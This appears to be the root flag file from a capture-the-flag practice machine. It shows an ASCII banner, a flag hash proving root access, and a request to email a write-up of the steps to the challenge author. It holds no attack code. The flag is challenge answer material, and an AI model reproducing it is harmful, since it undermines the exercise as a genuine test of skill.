▐░░░░░░░░░░░▌ ▐░▌ ▐░░░░░░░░░░▌▐░░░░░░░░░░░▐░▌ ▐░▐░▌ ▐░▐░▌ ▐░░▐░░░░░░░░░░░▐░░░░░░░░░░░▐░▌ ▐░▌ ▐░▌ ▐░░░░░░░░░▌ ▐░░░░░░░░░▌
▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀ ▀ ▀ ▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀
flag = c0523985a2640ad30429fb2055196e4c
Thia flag is a proof that you get the root shell.
You have to submit your report contaning all steps you take to get root shell.
Send your report to our official mail : vishalbiswas420@gmail.com
root@ck00:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
